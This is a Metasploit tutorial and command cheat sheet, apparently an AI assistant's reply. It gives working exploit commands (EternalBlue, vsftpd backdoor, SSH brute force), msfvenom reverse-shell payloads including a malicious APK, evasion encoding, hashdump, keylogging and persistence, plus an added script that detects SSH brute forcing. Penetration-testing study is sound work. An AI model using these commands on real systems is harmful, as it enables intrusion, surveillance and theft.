Metasploit Framework Notes: Tutorials, Commands & Examples for Different Devices
Metasploit (MSF) is an open-source penetration testing framework used for developing, testing, and executing exploits. It simplifies the process of discovering and exploiting vulnerabilities.
Warning: Use only on systems you own or have explicit permission to test. Unauthorized use is illegal.

1. Installation & Starting Metasploit
Kali Linux (recommended):
    sudo apt update && sudo apt install metasploit-framework
    msfconsole
Update Database:
    msfdb init
    msfconsole -q
Basic Commands (msfconsole):
- help or ? — Show help
- search [keyword] — e.g., search eternalblue or search type:exploit platform:windows
- use [module_path] — Load module
- show options — View required settings
- set [OPTION] [value] — e.g., set RHOSTS 192.168.1.100
- show payloads / set PAYLOAD [payload]
- exploit or run — Execute
- sessions -l — List sessions
- sessions -i 1 — Interact with session 1
- background — Background current session
- info — Module details
2. Key Module Types
- Exploits — Code that takes advantage of vulnerabilities (exploit/).
- Payloads — Code executed after successful exploit (payloads/).
- Auxiliary — Scanning, fuzzing, DoS, etc. (auxiliary/).
- Post — Post-exploitation modules (post/).
- Encoders — Evade detection.
- Nops — No-operation sleds.
Common Payloads:
- windows/meterpreter/reverse_tcp — Best for Windows.
- linux/meterpreter/reverse_tcp — For Linux.
- android/meterpreter/reverse_tcp — For Android.
- cmd/unix/reverse — Basic shells.
3. Examples by Device / OS
Windows
EternalBlue (MS17-010) — Classic SMB exploit:
    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
    msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf6 exploit(ms17_010_eternalblue) > set LHOST <your_ip>
    msf6 exploit(ms17_010_eternalblue) > exploit
PsExec (Requires credentials):
    use exploit/windows/smb/psexec
    set SMBUser administrator
    set SMBPass password
    set PAYLOAD windows/meterpreter/reverse_tcp
Meterpreter Commands (after gaining session):
- sysinfo
- getuid
- shell
- screenshot
- keyscan_start
- upload / download
- migrate — Move to stable process
Linux
vsftpd 2.3.4 Backdoor (Metasploitable example):
    use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS 192.168.1.101
    set PAYLOAD cmd/unix/interact
    exploit
Dirty COW or modern privilege escalation:
    search linux local privilege
    use exploit/linux/local/dirty_cow # Example
SSH brute force (auxiliary):
    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS 192.168.1.0/24
    set USER_FILE users.txt
    set PASS_FILE passwords.txt
    run
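What a list-driven ssh_login run like the one above leaves in a target's sshd log, and one way to flag it. This is an added example, not part of the original notes; the function names, thresholds and log lines are constructed for illustration and assume the standard OpenSSH "Failed password" message format.

```shell
#!/bin/sh
# Added example: thresholds and the sample log lines are constructed.

# Usage: detect_ssh_bruteforce [MIN_FAILURES] [MIN_USERS] < /var/log/auth.log
# Prints "ip failures distinct_users" for each source meeting both thresholds.
detect_ssh_bruteforce() {
  awk -v mf="${1:-5}" -v mu="${2:-2}" '
    /sshd\[[0-9]+\]: Failed password for / {
      # Parse from the end of the line: "... USER from IP port N ssh2".
      # Counting back from NF keeps odd user names from shifting the fields.
      if (NF < 6 || $(NF-4) != "from" || $(NF-2) != "port") next
      ip = $(NF-3); user = $(NF-5)
      fails[ip]++
      if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    END {
      for (ip in fails)
        if (fails[ip] >= mf && users[ip] >= mu)
          print ip, fails[ip], users[ip]
    }
  ' | sort
}

# Constructed sshd lines: one list-driven source, one legitimate user who
# mistyped a password twice, and one source guessing at a single account.
sample_auth_log() {
  cat <<'EOF'
Jan 10 10:00:01 web01 sshd[2101]: Failed password for invalid user admin from 192.168.1.50 port 40110 ssh2
Jan 10 10:00:02 web01 sshd[2102]: Failed password for root from 192.168.1.50 port 40112 ssh2
Jan 10 10:00:02 web01 sshd[2103]: Failed password for root from 192.168.1.50 port 40114 ssh2
Jan 10 10:00:03 web01 sshd[2104]: Failed password for invalid user test from 192.168.1.50 port 40116 ssh2
Jan 10 10:00:04 web01 sshd[2105]: Failed password for invalid user oracle from 192.168.1.50 port 40118 ssh2
Jan 10 10:00:05 web01 sshd[2106]: Failed password for invalid user admin from 192.168.1.50 port 40120 ssh2
Jan 10 10:02:10 web01 sshd[2120]: Failed password for alice from 192.168.1.77 port 51500 ssh2
Jan 10 10:02:15 web01 sshd[2120]: Failed password for alice from 192.168.1.77 port 51500 ssh2
Jan 10 10:02:21 web01 sshd[2120]: Accepted password for alice from 192.168.1.77 port 51500 ssh2
Jan 10 10:05:00 web01 sshd[2130]: Failed password for backup from 10.0.0.9 port 33000 ssh2
Jan 10 10:05:01 web01 sshd[2131]: Failed password for backup from 10.0.0.9 port 33002 ssh2
Jan 10 10:05:02 web01 sshd[2132]: Failed password for backup from 10.0.0.9 port 33004 ssh2
Jan 10 10:05:03 web01 sshd[2133]: Failed password for backup from 10.0.0.9 port 33006 ssh2
Jan 10 10:05:04 web01 sshd[2134]: Failed password for backup from 10.0.0.9 port 33008 ssh2
EOF
}

sample_auth_log | detect_ssh_bruteforce 5 2   # -> 192.168.1.50 6 4
```

Lowering MIN_USERS to 1 also catches password guessing against a single account (10.0.0.9 in the sample); both thresholds are starting points to tune per environment.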
Android
Generate APK Payload (msfvenom):
    msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 R > malicious.apk
Listener:
    use exploit/multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST <your_ip>
    set LPORT 4444
    exploit
Post-Exploitation:
- dump_sms
- dump_contacts
- geolocate
- webcam_snap
Routers / Network Devices (Cisco, etc.)
Cisco IOS:
    search cisco
    use exploit/unix/misc/cisco_ios_http_exec # Example
Auxiliary Scanner:
    use auxiliary/scanner/http/cisco_device_manager
SNMP Enumeration:
    use auxiliary/scanner/snmp/snmp_enum
Web Applications / Multi-Platform
Generic HTTP Command Execution:
    use exploit/multi/http/os_cmd_exec # Newer modules available
WordPress / CMS:
    search wordpress
    # Example: WP plugin exploits
Java / Tomcat:
    use exploit/multi/http/tomcat_mgr_deploy
macOS / Apple
    search type:exploit platform:osx
4. Generating Payloads with msfvenom
    # Windows EXE
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > payload.exe

    # Linux ELF
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > payload.elf

    # Encoded for evasion
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=... -e x86/shikata_ga_nai -i 5 -f exe
List all payloads:
    msfvenom -l payloads
5. Post-Exploitation Modules
After gaining a Meterpreter session:
    run post/windows/gather/hashdump
    run post/multi/gather/smart_hashdump
    run post/linux/gather/enum_configs
Persistence:
    run persistence -U -i 5 -p 4444 -r <your_ip> # Windows
6. Best Practices & Tips
- Always update Metasploit regularly.
- Use db_nmap to import Nmap scans: db_nmap -sV -O target.
- Workspace management: workspace -a lab1.
- Resource scripts (.rc files) for automation.
- Evasion: Use encoders, polymorphic payloads, HTTPS reverse shells.
- Combine with Nmap from previous tutorials.
- Check targets with the check command (if module supports it).
7. Common Workflows
- Recon → Nmap → Import to MSF DB.
- Vulnerability scanning (auxiliary modules).
- Exploit + Payload.
- Post-exploitation & Pivoting.
- Cleanup.
Resources:
- Official Docs: https://docs.rapid7.com/metasploit/
- Metasploit Unleashed (free course)
- NSE + Metasploit integration (use Nmap scripts to feed targets)
This covers common devices (Windows, Linux, Android, Routers, Web). Want deeper notes on a specific exploit, custom module, or evasion techniques? Or a full lab walkthrough? Let me know!
Stay ethical. Happy (legal) hacking! 🔴